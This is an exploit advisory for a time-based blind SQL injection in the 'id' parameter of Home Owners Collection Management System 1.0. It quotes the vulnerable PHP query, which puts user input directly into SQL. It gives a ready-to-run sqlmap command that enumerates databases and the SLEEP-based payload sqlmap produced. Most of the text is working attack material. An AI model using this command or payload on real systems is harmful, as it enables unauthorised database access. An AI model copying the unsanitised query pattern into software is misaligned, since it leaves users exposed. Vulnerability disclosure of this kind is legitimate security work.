Home Owners Collection Management System 1.0 SQL Injection

`# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection  
# Date: 9/02/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Windows 10  
  
  
# Vulnerable Code  
  
line 68 in file "/hocms/admin/members/view_member.php"  
  
$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");  
  
  
# Sqlmap command:  
  
sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch  
  
# Output:  
  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member  
`